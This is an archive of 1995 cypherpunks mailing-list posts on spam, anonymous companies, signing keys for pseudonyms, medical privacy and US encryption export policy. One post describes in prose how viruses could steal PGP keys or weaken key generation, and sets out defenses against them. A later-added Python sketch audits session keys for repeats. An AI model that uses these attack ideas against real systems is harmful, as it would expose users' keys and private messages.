Their customers are receiving unwanted e-mail advertisements from the Internet. Compuserve sysops are attempting to block the spamming but are finding it difficult because the advertiser is coming in via different routes. They are also attempting to stop them using the court system. The advertiser, according to the Compuserve sysop, threatened a mail-bombing if Compuserve tried to block them!!! This would be a just cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured response". ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. From drcharpe at hamlet.uncg.edu Mon Nov 20 09:45:20 1995 From: drcharpe at hamlet.uncg.edu (Daniel 'genius' Charpentier) Date: Tue, 21 Nov 1995 01:45:20 +0800 Subject: WRITTEN CODE In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com> Message-ID: On Mon, 20 Nov 1995 anonymous-remailer at shell.portal.com wrote: > On Sat, 18 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > > > Curious, where is uncg.edu? Your French name doesn't make me think you're > > in the States (as an .edu address might suggest, but then not necessarily > > either). (univ of Calgary?) uncg.edu is in North Carolina. uncg stands for University of North Carolina at Greensboro. From hallam at w3.org Mon Nov 20 11:13:03 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 21 Nov 1995 03:13:03 +0800 Subject: "Junk E-Mail" In-Reply-To: <9511201710.AA25590@toad.com> Message-ID: <9511201851.AA28000@zorch.w3.org> > The advertiser, according to the Compuserve sysop, threatened a >mail-bombing if Compuserve tried to block them!!! This would be a just >cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured >response". I think it would be better to slap a RICO suit onto the company concerned.
It sounds to me like an attempt to gain financial advantage through threatening behaviour. Where I come from that means jail time. Phill From sdavidm at iconz.co.nz Mon Nov 20 11:46:57 1995 From: sdavidm at iconz.co.nz (David Murray) Date: Tue, 21 Nov 1995 03:46:57 +0800 Subject: Anonymity and Intellectual Capital In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In message , s1113645 at tesla.cc.uottawa.ca said: > On Sat, 18 Nov 1995, David Murray wrote: > > > unincorporated, or deed of settlement, company. > ... > Barring escrow services, I don't see how contracts (or a lot of > other laws) could be enforced against these entities when they can simply pop > in and out of existence (unless they have some physical counterpart, like > a storefront and merchandise. But then these are easily linkable to True > Names, unlike software companies, financial services or any other part of > the info economy.) But the assets of the company are held by (known) trustees and exposed to judgment - the pseudonymous part just means that _only_ those assets are exposed. For instance, an enterprising cypherpunk decides it would be a good thing to run a restaurant with a crypto-anarchy theme (cajun style Blacknet burgers, anonymous avocado salad, Phil Zimmerman celebrity cocktail...). Unaccountably, a thousand other cypherpunks decide to invest $100 each. More understandably, they don't want it to be known that they invested. By buying shares in an unincorporated company pseudonymously (including anonymously) they can risk $100, but $100 only. The money is (initially) held in the trustee's bank account (having been subscribed in ecash), so the cheques for the tables and chairs won't bounce. The chairs, tables, kitchen equipment, lease etc will also be held by the trustee on trust for the partnership/company, and will be available for creditors should the partnership not meet its obligations.
So doing business with an unincorporated company is very much like doing business with an incorporated company/corporation. (I can see that audited accounts, for instance, could be useful in attracting investors/reassuring creditors.) Note that the argument works just as well for intangible assets - even digital assets - as for tangible ones like tables. So our enterprising cypherpunk might well have started a bank, insurance company or mutual fund (except for all the other regulatory hassles :-) > Besides, if companies in general can set up other companies, in a > trustworthy and non-anon jurisdiction, couldn't these foreign anon companies > do the same in the present system and therefore make it very hard to know > if any company in any country is non-anon? Yes. But you have to have your base anon corporation to be the penultimate stockholder of the other corporations. And it can be expensive - perhaps too expensive to be worth the gain in anonymity. There is also the matter of having to have human directors with revealed True Names in most non-anon and "trustworthy" jurisdictions. There are other ways to anonymise corporations - I presented a proposal to the list about a year ago that simply interposed a unit-like trust as sole (legal) shareholder of the corporation, the "units" in the trust mirroring the shares but being held anonymously. Any of these structures can/might be useful. What I like about unincorporated companies, however, is the way they rely only on the common law and equity, and bypass statute - enabling, perhaps, less reliance upon the law of any particular State. > I'm not completely sure I understood your explanation of a > deed-of-settlement corp. and the idea of an "unincorporated" company. ^^^^^ Not "corporation", "company", as in collective noun :-) An incorported company is a corporation, but in general, company ~= corporation. 
It is just that for well over a hundred years there have not been any companies that have _not_ been incorporated, except dance companies, infantry companies etc. > (Unincorporated in what way, and what were the registration and ID > requirements?) Unincorporated in every way :-) Which is to say, not a seperate legal entity but a partnership (of shareholders) coupled with a trust of the partnership assets. And because it relies only on partnership/agency/contract law and the law of trusts, there were no registration or ID requirements, just as there are no registration or ID requirements for forming a partnership or trust now. (Compare, for instance, the requirement on NZ incorporated companies to keep public records of the name and [in the case of natural persons, residential] address of everyone who has been a shareholder in the last ten years.) > Any references? Thanks. A lot of Corporate/Company law books have some coverage of this stuff in their historical chapters - try English or Australian texts (Gower is quite good). Legal history texts also often have something. Du Bois published a book (in the 1940's ?) that seems to be cited for all manner of minutiae - it has something about the Bubble Act in its (long) title. [If you find this book, how about sending me a summary :-) Chapter III is probably most useful.] And J. Reeder "Corporate Loan Financing in the 17th and 18th Centuries" (1973) 2 Anglo-American Law Review 487 is supposed to have something about bond issues by unincorporated companies (or is it bank lending?). Cheers, Dm. 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMLBKhllo3j8JHzalAQF/PQP7BWH7JGNNazI2ehSpOldEysa+FZbirHLs hkbqOIFDJzBXtQ3lyiA1lZydMdDTxpNAF0oGveNosX6Sw3l23Hu/j+EGg7hOGLq3 IVchirf24/puj6HWwQbD9LlMB1SARNKkwG+0NI6saYz/z0JVHdtw7c6/dvoxcVZX M/T8qjWddqs= =wLPd -----END PGP SIGNATURE----- [Palmtop News Reader - Beta Version 3] From stewarts at ix.netcom.com Mon Nov 20 12:07:29 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 21 Nov 1995 04:07:29 +0800 Subject: [NON-LIST] Re: reputations: discussions and meta-discussions Message-ID: <199511200819.AAA22823@ix12.ix.netcom.com> (This really should be in private mail; keyid D072FC19 (still unnamed) can reach me using anon.penet.fi or alpha.c2.org or a reply-block remailer to get replies.... Or if you prefer, send me one-way remail and I'll post replies in alt.anonymous.messages.) At 02:17 AM 11/19/95 -0800, - keyid D072FC19 (still unnamed) wrote: >On Sat, 18 Nov 1995, Bill Stewart wrote: >> Here's the new entity's key, signed :-) I haven't added it to the >> PGP key servers; I'll leave that up to you... > >As we know, a public key certificate is a binding between the key and >some attribute, as asserted by the signer. In this case you have asserted >a binding between my key and the string "a new entity, as yet unnamed". >I don't understand why you did this. Would you please explain? >The only reason I can think of is that you wanted to provide evidence >for the key's creation date by timestamping it. If that was the case, >I thank you. But in the future, to avoid confusion, perhaps you can >create a new ID "timestamp" for the key and sign that instead. Are you asking why I used the string "a new entity, as yet unnamed", or why I certified it? If the former, it's because when I loaded the PGP key block into my public key file, that's who it said it was, and it matched the name in your cypherpunks posting. 
If you're asking why I certified a key used by a nym, I started doing that a couple months ago, as an experiment about what it means to certify keys and how to provide better continuity for keys used by nyms, and signing yours seemed like an appropriate thing to do (since you chose to name your key as belonging to the same string you signed your message with.) I have the policy of only signing one key for a given namestring with the key I use for signing nyms, so it gives a certain evidence of uniqueness as well as the timestamping effect. Since you also commented on cluttering up namespace, I didn't send the key to the keyserver myself; that's up to you.

Has it been a wildly successful experiment? Well, no :-) But I've at least had to think about some of the issues more, and a couple of people have gotten their nym keys signed.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From frantz at netcom.com Mon Nov 20 12:09:53 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 04:09:53 +0800
Subject: Virus attacks on PGP
Message-ID: <199511201945.LAA27486@netcom10.netcom.com>

PGP can be vulnerable to virus attacks. (Similar attacks can be made on other cipher systems.) These virus attacks can either be "Get the Key", or "Subvert the System" attacks. Schneier's "Rubber Hose" attack and a class of attack which I will call "Black Bag" attacks are get the key attacks. With a black bag attack, victims do not know their keys have been stolen, and so continue to use them. (According to "The Puzzle Palace", NSA got the FBI to perform black bag attacks on embassies in Washington DC.) I don't think subvert the system attacks have any parallel in classical cryptography.

Get the Key Attacks

PGP has three keys: the secret key ring pass phrase, the secret RSA key, and the IDEA key. Getting any of them would constitute a successful attack.

A virus that collects secret key rings and sends their contents somewhere, either via UDP-like messages or by dialing the modem late at night, doesn't seem too much harder to build than one that erases your hard disk. If it runs only once per machine, its chances of getting caught are fairly low. The standard IP error handling of "throw away the packet" means that it probably won't be caught by firewalls. It seems more likely that someone will catch their computer making an unauthorized 800 number call. This attack would allow an opponent to use a brute force attack on the pass phrase.

Getting the pass phrase or the IDEA key requires that the virus infect something in the PGP environment. The infection could be to PGP itself, or to the operating system in which it runs. (N.B. Since Mac and PC systems have only one protection domain, all programs running in them are part of the operating system for the sake of this analysis.) Assuming PGP is infected, although similar arguments apply to the operating system, the possible mechanisms of infection are many:

    An infected PGP binary is installed
    A virus modifies disk copies of PGP
    The OS's loader is infected to modify PGP as it is loaded
    The compiler or linker is infected to modify PGP.

Any of these forms of infection could send pass phrases, secret keys, or IDEA keys out via IP or modem.

Subvert the System Attacks

The mechanisms of infection are similar to those of the get the key attacks, but these attacks do not require that the virus send data outside the machine. Instead, these attacks act by reducing the size of one of the three key spaces, making it vulnerable to brute force attacks. For example, if the OS provides a "random number" service, then limiting the randomness of the numbers constitutes an attack. Making RSA key generation loosely connected to the date and time constitutes an attack.

Defenses

One standard defense in classical cryptography is to frequently change the cipher keys.
The PGP web-of-trust makes changing keys difficult, and is perhaps the weakest part of the overall protocol.

Standard defenses against viruses can help, but if the attacker is determined and competent, then the virus will not be detected by virus detection programs, and will not have bugs which cause noticeable ill effects on infected machines.

Custom changes to things like random number utilities and the PGP code itself may increase resistance by preventing some of these attacks from identifying the modified code as its intended target.

Auditing code, preferably object code, can detect infection. Having ALL the source code available is almost a requirement here.

Maintaining a file of cryptographic hashes of the IDEA keys used and checking for duplicates can detect subvert the system attacks on IDEA key generation at the risk that the cryptographic hash is in fact invertible and can be used to reveal the IDEA key.

Using operating systems which run in many small protection domains can limit the opportunity for infection. One such system I have been involved with for over 20 years is described at the following WEB sites:

    http://www.cis.upenn.edu/~KeyKOS/
    http://www.webcom.com/agorics/allkey.html

Bill

-----------------------------------------------------------------
Bill Frantz          Periwinkle -- Computer Consulting
(408)356-8506        16345 Englewood Ave.
frantz at netcom.com Los Gatos, CA 95032, USA

From llurch at networking.stanford.edu Mon Nov 20 12:15:25 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Tue, 21 Nov 1995 04:15:25 +0800
Subject: "Junk Email"
Message-ID:

See http://www.valleynet.net/hypermail/html/

Hurry, they might turn it off.
ROTFL -rich From hroller at c2.org Mon Nov 20 12:45:06 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Tue, 21 Nov 1995 04:45:06 +0800 Subject: No Subject Message-ID: <199511202005.MAA25006@infinity.c2.org> The other anonymous poster was referring to Detweiler's belief that cryptoanarchy was a budding Nazism as one of his apparent motivations. After a little bit of amateur Detweiler study I can agree with this. His page at http://www.csn.net/~ldetweil/ has sections that emphasize his concern about cryptoanarchy as a kind of "neo-nazism". Thankfully the cryptoanarchist sentiments on this list are much different than nazism in the way it advocates complete disengagement from the political process, something that tended to make the Nazist agenda highly dangerous. Without that you just have a bunch of subversive guerillas. Like gnats, irritating but irrelevant. So as long as we stick with the non-political advocation, and stay disorganized, and don't ever amount to anything significant as far as visible political clout, I think Detweiler is generally going to continue to leave us alone, thank God. From anon-remailer at utopia.hacktic.nl Mon Nov 20 12:45:51 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Tue, 21 Nov 1995 04:45:51 +0800 Subject: Spam the Sign! Message-ID: <199511202020.VAA01688@utopia.hacktic.nl> On September 27, Jeff Weinstein of Netscape (and others) wrote: > > > ... would be nice if we could get 128 bit keys, though ... (hint, > > > hint). > > > > We are working this issue with the government. As soon as we can > > make it available for download we will. > In other words, we will never see it in our lifetimes -- the > bureaucreeps aren't known for promoting the spread of strong crypto. >> Where did I imply that if the govt. ignored us or said no that we >> would meekly go away with tail between legs? Netscape has a cute little Times Square scrolling sign in their engineering dept. 
- you can leave a message for all to see at: www.netscape.com/people/mtoy/sign/index.html Drop by and ask Jeff where his tail is these days. };-> From JWRCLUM at aol.com Mon Nov 20 12:49:03 1995 From: JWRCLUM at aol.com (JWRCLUM at aol.com) Date: Tue, 21 Nov 1995 04:49:03 +0800 Subject: Privacy Rights Alert Message-ID: <951120150426_28561669@emout06.mail.aol.com> From: American Civil Liberties Union of Massachusetts jwrclum at aol.com Re: Privacy Rights Alert Date: November 20, 1995 c 1995 ACLUMA We at the American Civil Liberties Union of Massachusetts want to alert you to the fact that the right to medical privacy of all Americans is imperiled by a bill just introduced in the U.S. Congress. This bill, which is claimed to be a "Medical Records Confidentiality Act," in reality may turn out to be profoundly destructive of your right to privacy. Although Part I does contain certain aspects which could help privacy, Part II undercuts the very fabric of patient- doctor confidentiality. First, it preempts many state law and common law protections which currently exist. Second, it pushes the further computerization of medical records, and will bring about the creation of "Health Information Services" --- corporate entities which would receive, process, and serve as libraries for actual on-line medical records forwarded from hospitals, clinics, and individual doctors. It appears that this will take place without any requirement for individual patients' authorization or consent. As we all know, computerized data bases are not immune from being accessed by both unauthorized "outsiders" and unauthorized "insiders." Centralization of data storage, especially in electronic form, simplifies its being accessed. But aside from that, the bill would actually authorize access to the medical records in these data bases by a host of government and non-government entities. 
Each of our medical records would thus become part of a computerized "lending library" --- an internet of medical records. For example, the bill would permit release of your medical records from "Health Information Services" (the on-line data base holders) and "Health Information 'Trustees'" (providers, hospitals, health plans, employers, insurers, and health oversight agencies) to the following (among others): - Release to researchers (along with your medical history, it is possible that identifying information including your name, address, and phone number would be sent). - Nearly-automatic release, to the opposing party in a lawsuit, of your entire medical history, if your health, physical or mental, has been raised by you as an issue in that lawsuit. - Release to law-enforcement authorities under certain circumstances. - Release to Public Health Agencies under certain circumstances. - Release based on Judicial Warrant --- you would be notified by mail within 30 days after execution of the warrant (90 days or more with the government's ex parte option). - Release based on Judicial Subpoena, Grand Jury Subpoena, or Administrative Agency (e.g. Social Security) Subpoena --- you would be notified on or before the date of its execution (or within 90 days thereafter [or longer] with the government's ex parte option). -A special variant of this, where the identity of the patient is "unknown," would allow the search of records (plural) in order to identify the person being sought. [In essence, this would allow "fishing" expeditions, using a computerized net, into the private lives of Americans.] In some of these situations, you, the patient, will only be informed after the records have been released. You may, in some circumstances, have the legal right to "attempt to quash" the subpoena (etc.) by seeking a court's intervention. 
However, the standard by which the court is to reach a decision on this will be mandated by this bill to be a consideration of whether the government's interest in obtaining the information outweighs the privacy interest of the individual. We would encourage you to pull up a copy of the actual bill and view it yourself. This can be done through the Library of Congress internet site at http:\\thomas.loc.gov (104th Congress, Senate bill number S 1360 ). Alternatively, a hard copy by mail can be requested from the U.S. Senate Documents Room, by faxing to 202-228-2815 a note containing the bill number and your mailing address. All our voices need to be heard in order to help make certain that this bill is not passed by Congress. Possible actions include: (1) Letters to your Senators and congresspersons, and to the House and Senate leadership. (2) Letters to local newspapers and other media. (3) Forwarding the contents of this message to places where you feel it will be of interest and have impact. This document may be re-distributed freely, provided it remains in its entirety. If you value your right to privacy, the time to act is now.... From rah at shipwright.com Mon Nov 20 14:29:22 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 21 Nov 1995 06:29:22 +0800 Subject: "Dear Newt" Letter... Message-ID: My, *this* looks interesting... Cheers, Bob Hettinga --- begin forwarded text Date: 20 Nov 1995 11:21:01 -0800 Subject: please fwd to cpunks if you To: "Bob Hettinga" The Ad Hoc Taxpayer Coalition for Computer Privacy November 8, 1995 The Honorable Newt Gingrich Speaker of the House of Representatives H-232 The Capitol Washington, DC 20515-6502 Dear Mr. Speaker: We are writing to express serious concerns about the Administration's efforts to continue to restrict the ability of computer users at home and abroad to protect their personal and private information over electronic networks through the use of encryption technology. 
The Administration seems determined to ensure government surveillance of all electronic information and communications. It began with President Clinton's "Clipper Chip," but has not stopped. Consumers aren't happy with these proposals, and neither is the business community nor civil libertarians. In fact, it's hard to find anyone supportive outside the Administration except for the few that would benefit from the Administration's "proposed relaxation" of the nation's export policy. The Administration refuses to let American computer hardware and software companies sell products with good encryption worldwide unless the U.S. Government is guaranteed access to a key that unlocks that information. The Administration is trying to leverage these companies' need to export -- they derive more than half their earnings from sales abroad -- and desire to develop a single product worldwide, to force them to include a feature in products they sell in the U.S. and abroad that will allow government access. Administration officials also have said that if American companies do not "voluntarily" include such a feature, then they will seek legislation making such a feature mandatory. The Administration's approach is the wrong policy for today's marketplace. It's anti-consumer. Computer users will not entrust their sensitive information to computer networks unless its security and privacy are assured. Without good privacy protection, there simply will not be a Global Information Infrastructure -- and America won't be in the lead. It's anti-marketplace. There is no consumer demand for encryption products that give the government easy access. The Administration has come forward with a typical big-government approach -- a government designed solution for a government problem. This completely overlooks the realities of a free-market. It is anti-American business. 
The Administration's current policies are seriously harming the continued competitiveness of one of our fastest growing and most successful industries -- the computer hardware and software industry. Computer users are demanding good encryption but American companies are not allowed to supply it. Yet there are hundreds of foreign encryption products manufactured and encryption programs are widely available on the Internet. Finally, it is anti-progress. Wishing that there was no encryption available will not make it so. The technology is widely understood and available -- you can't put this genie basic in the bottle. Government policies should not encumber the American computing industry as it leads the world technology revolution. We strongly urge you to oppose attempts to limit the ability of Americans to use whatever encryption they wish and to support the immediate relaxation of harmful export controls on American products and programs with encryption features. The Ad Hoc Taxpayer Coalition for Computer Privacy Americans for Tax Reform Association of Concerned Taxpayers Competitive Enterprise Institute Citizens for a Sound Economy The Business Leadership Council The Small Business Survival Committee Citizens Against a National Sales Tax/VAT Virginia Postrel, Editor, Reason magazine Sheldon Richman, Senior Editor, The Cato Institute Tanya Metaksa, Executive Director, Institute for Legislative Action, National Rifle Association Kellyanne Fitzpatrick, The Polling Company Donna Matias, Institute for Justice =+=+=+=+ This information is provided as a service of the National Rifle Association Institute for Legislative Action, Fairfax, VA. 

This and other information on the Second Amendment and the NRA is
available at any of the following URL's: http://WWW.NRA.Org,
gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
mailto:LISTPROC at NRA.Org (Send the word help as the body of a message)

Information may also be obtained by connecting directly to the
NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From hallam at w3.org Mon Nov 20 14:45:58 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 21 Nov 1995 06:45:58 +0800
Subject: No Privacy Right in Indonesia ?
In-Reply-To:
Message-ID: <9511202205.AA28370@zorch.w3.org>

>An 11 17 95 Reuter Information Service newsstory headlined
>
> Politics, not sex, is Indonesian Internet's concern

Absolutely. We designed it this way. One of the key ideas was to provide such governments with a choice between having their power structures eroded by democratic influences or to sink into technological obsolescence.

The US govt. stands to do best from all this. Democratic govt.s in general will win. Those that will lose are those which attempt to stamp a political or cultural orthodoxy on their people.

Communication is the greatest threat to tyranny. That is why all tyrannies must control communications. It is worth considering that when Stalin died he was considered the saviour of the country, even by those who should have known the truth. It was only after Khrushchev's speech to the closed session that the truth became known inside the party. Note that even those who were the victims of the oppression had believed that Stalin was a hero.
"It is a mistake", "if only Stalin knew" yet Stalin knew all along and this was obvious to the outside observer.

East Germany fell when the size of the defections became known within the country. It was clear that the regime was bankrupt and that people were voting with their feet.

Cuba will not be brought down by sanctions, that policy has failed for thirty years and shows no signs of achieving anything. On the other hand the communist structures would probably be swept away in months were the US to admit defeat (thus acknowledging the Cuban people's "victory") and start package tourist flights. Once it was in the interests of the nomenklatura to become capitalists they would change.

South Africa was not brought down by sanctions per se, they had an effect because they demonstrated that the Western world did not accept the apartheid principles. South Africa tried to see itself as a part of the West and that was crucial to the apartheid mindset. Sanctions demonstrated that South Africa was not considered a friend or ally.

Phill

From fc at all.net Mon Nov 20 15:08:24 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Tue, 21 Nov 1995 07:08:24 +0800
Subject: "Dear Newt" Letter...
In-Reply-To:
Message-ID: <9511202228.AA16586@all.net>

*** FLAME ON ***

Quoted in complete context for your protection:

> --- begin forwarded text
>
> Date: 20 Nov 1995 11:21:01 -0800
> Subject: please fwd to cpunks if you
> To: "Bob Hettinga"
>
> The Ad Hoc Taxpayer Coalition for Computer Privacy
>
> November 8, 1995
>
> The Honorable Newt Gingrich
> Speaker of the House of Representatives
> H-232 The Capitol
> Washington, DC 20515-6502
>
> Dear Mr. Speaker:
>
> We are writing to express serious concerns about the
> Administration's efforts to continue to restrict the ability
> of computer users at home and abroad to protect their personal
> and private information over electronic networks through the
> use of encryption technology. The Administration seems
> determined to ensure government surveillance of all electronic
> information and communications. It began with President
> Clinton's "Clipper Chip," but has not stopped.

Whoa! Clinton didn't start the Clipper initiative. Try Reagan/Bush!

Administration's efforts - hardly. They inherited and mostly agreed

computer users at home and abroad - not according to what I've seen and read - they want to stop export of good crypto, not internal use thereof.

It's the FBI that wants to read all your email and tap your phones. The administration is just going along as far as I can tell, and so is Newt.

> Consumers aren't happy with these proposals, and neither is
> the business community nor civil libertarians. In fact, it's
> hard to find anyone supportive outside the Administration
> except for the few that would benefit from the
> Administration's "proposed relaxation" of the nation's export
> policy.

The vast majority of consumers don't care as far as I can tell. Same with most of the small business community (the vast majority of the whole business community in the US).

> The Administration refuses to let American computer hardware
> and software companies sell products with good encryption
> worldwide unless the U.S. Government is guaranteed access to a
> key that unlocks that information.

Dead flat wrong. What is required is an export license, and they are attainable.

> The Administration is
> trying to leverage these companies' need to export -- they
> derive more than half their earnings from sales abroad -- and
> desire to develop a single product worldwide, to force them to
> include a feature in products they sell in the U.S. and abroad
> that will allow government access.

What's your basis for this conclusion? They have not said so as far as I can tell.

> Administration officials
> also have said that if American companies do not "voluntarily"
> include such a feature, then they will seek legislation making
> such a feature mandatory.

Which ones said exactly what?

> The Administration's approach is the wrong policy for today's
> marketplace.

Finally something I agree on.

> It's anti-consumer. Computer users will not entrust their
> sensitive information to computer networks unless its security
> and privacy are assured. Without good privacy protection,
> there simply will not be a Global Information Infrastructure
> -- and America won't be in the lead.

I don't think most consumers care at all unless and until it directly affects them in a way they can see and understand the connection with. There already is a GII, America is in the lead in some areas, and the privacy issue is not a very important one judging by the vast majority of users who use it regardless of and in ignorance of privacy protection.

> It's anti-marketplace. There is no consumer demand for
> encryption products that give the government easy access. The
> Administration has come forward with a typical big-government
> approach -- a government designed solution for a government
> problem. This completely overlooks the realities of a
> free-market.

There is almost no consumer demand for encryption. The demand that exists is primarily business and government, and the government side seems to think Clipper is a good idea.

> It is anti-American business. The Administration's current
> policies are seriously harming the continued competitiveness
> of one of our fastest growing and most successful industries
> -- the computer hardware and software industry. Computer users
> are demanding good encryption but American companies are not
> allowed to supply it. Yet there are hundreds of foreign
> encryption products manufactured and encryption programs are
> widely available on the Internet.

It's not as good for American business as it could be, but Clipper might be very good for American businesses currently being attacked by foreign interests.
These hundreds of foreign encryption products may contain the same sorts of holes you fear in US products. Your proposal might be even worse for the US.

> Finally, it is anti-progress. Wishing that there was no
> encryption available will not make it so. The technology is
> widely understood and available -- you can't put this genie
> basic in the bottle. Government policies should not encumber
> the American computing industry as it leads the world
> technology revolution.

History does not agree with you. Progress has not historically been generated by the availability of encryption. It may be in the future, but for now your claim seems unsupported to me.

> We strongly urge you to oppose attempts to limit the ability
> of Americans to use whatever encryption they wish and to
> support the immediate relaxation of harmful export controls on
> American products and programs with encryption features.

I believe Newt is in favor of clipper and national defense and law enforcement, all of which strongly support Clipper, wire tapping, etc.

> The Ad Hoc Taxpayer Coalition for Computer Privacy
>
> Americans for Tax Reform
> Association of Concerned Taxpayers
> Competitive Enterprise Institute
> Citizens for a Sound Economy
> The Business Leadership Council
> The Small Business Survival Committee
> Citizens Against a National Sales Tax/VAT
>
> Virginia Postrel, Editor, Reason magazine
> Sheldon Richman, Senior Editor, The Cato Institute
> Tanya Metaksa, Executive Director, Institute for Legislative
> Action, National Rifle Association
> Kellyanne Fitzpatrick, The Polling Company
> Donna Matias, Institute for Justice
>
> =+=+=+=+
> This information is provided as a service of the National Rifle
> Association Institute for Legislative Action, Fairfax, VA.
> > This and other information on the Second Amendment and the NRA is > available at any of the following URL's: http://WWW.NRA.Org, > gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org, > mailto:LISTPROC at NRA.Org (Send the word help as the body of a message) > > Information may also be obtained by connecting directly to the > NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121. > > --- end forwarded text > > > ----------------- > Robert Hettinga (rah at shipwright.com) > e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 > "Reality is not optional." --Thomas Sowell > The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah > >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< If the NRA has all that cash, why don't they support a much better letter to Newt that is well supported by facts and has enough punch to really sway him? -- -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From jimbell at pacifier.com Mon Nov 20 15:12:26 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 21 Nov 1995 07:12:26 +0800 Subject: Spam the Sign! Message-ID: >On September 27, Jeff Weinstein of Netscape (and others) wrote: > >> > > ... would be nice if we could get 128 bit keys, though ... (hint, >> > > hint). >> > >> > We are working this issue with the government. As soon as we can >> > make it available for download we will. > >> In other words, we will never see it in our lifetimes -- the >> bureaucreeps aren't known for promoting the spread of strong crypto. > >>> Where did I imply that if the govt. ignored us or said no that we >>> would meekly go away with tail between legs? Here's a question: Why can't Netscape be released WITHIN THE US with 128 bit keys? Admittedly, it would probably...uh...escape within a few hours, but that's no worse than what other cryptosystems (best-known example, PGP) have done. 
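
The duplicate-key check proposed under "Defenses" in Bill Frantz's "Virus attacks on PGP" message earlier in this archive, as an added Python sketch (not code from that message or from PGP). It swaps the plain hash he describes for a keyed HMAC-SHA-256 so the log by itself cannot be used to test guesses at a session key, which is the risk he names; `SessionKeyAudit`, the key generators and the 12-bit reduced key space are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
import random


class SessionKeyAudit:
    """Record of session-key fingerprints that reports any repeated key."""

    def __init__(self, audit_secret: bytes):
        # Assumption: audit_secret is stored apart from the fingerprint log,
        # so a copy of the log alone does not let anyone confirm key guesses.
        self._secret = audit_secret
        self._first_seen = {}   # fingerprint -> sequence number of first use
        self._count = 0

    def fingerprint(self, key: bytes) -> str:
        # Keyed fingerprint in place of the bare hash named in the message.
        return hmac.new(self._secret, key, hashlib.sha256).hexdigest()

    def record(self, key: bytes):
        """Log one key; return the sequence number of its earlier use, or None."""
        self._count += 1
        fp = self.fingerprint(key)
        first = self._first_seen.get(fp)
        if first is None:
            self._first_seen[fp] = self._count
        return first


def healthy_keygen() -> bytes:
    """128-bit key (the IDEA key size) from the OS random source."""
    return os.urandom(16)


def make_reduced_keygen(entropy_bits: int, seed: int):
    """Constructed stand-in for a key generator whose key space has been cut
    to 2**entropy_bits values; the output still looks like 16 random bytes."""
    rng = random.Random(seed)

    def keygen() -> bytes:
        small = rng.getrandbits(entropy_bits)
        return hashlib.sha256(small.to_bytes(8, "big")).digest()[:16]

    return keygen


def count_repeats(keygen, n_keys: int, audit_secret: bytes) -> int:
    """Generate n_keys keys and count how many repeat an earlier one."""
    audit = SessionKeyAudit(audit_secret)
    return sum(1 for _ in range(n_keys) if audit.record(keygen()) is not None)


if __name__ == "__main__":
    secret = os.urandom(32)
    print("healthy generator repeats:", count_repeats(healthy_keygen, 5000, secret))
    print("reduced generator repeats:",
          count_repeats(make_reduced_keygen(12, 1995), 5000, secret))
```

The check only fires on exact repeats, so a reduced key space is noticed once the number of logged keys approaches the square root of its size; it says nothing about keys that are predictable but never repeated.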
From hfinney at shell.portal.com Mon Nov 20 15:38:23 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 21 Nov 1995 07:38:23 +0800 Subject: Anonymity and Intellectual Capital Message-ID: <199511202231.OAA11611@jobe.shell.portal.com> The analogy between corporations protecting physical capital and anonymity protecting intellectual capital is interesting, and I will write a bit about it here. I don't think it quite works in all ways but it does suggest some ideas. Capital, as I use the word, means stuff which helps you be productive. Money can be physical capital, as can machines, computers, and so on, but generally not consumer goods. Traditionally, intellectual capital by the same definition refers to training, knowledge, experience, education - those mental skills and characteristics which help you produce. We have sometimes extended this notion here to reputation capital, which we often use just to mean your reputation itself, your good name. But if we are going to call it "capital" it should really be those aspects of your reputation which lead to productivity. To the extent that your good reputation helps you accomplish your productive goals, it can be considered capital. Particularly if you are a manager or performer in some other position where people's opinions of you make a big difference in how much you get done, you have a lot of reputation capital. Business reputations have many of the characteristics of capital, too. For some uses of anonymity it does make sense to think of them as protecting reputation capital. If you are going to send a message which carries a risk of harming your reputation, perhaps because it is terribly stupid or harsh, then anonymity can protect you in that way. I think some people do communicate anonymously for this reason. However there is another motivation, too, and that is fear of physical consequences. Some anonymous messages might lead to lawsuits or retribution in other forms, such as firing or blackballing. 
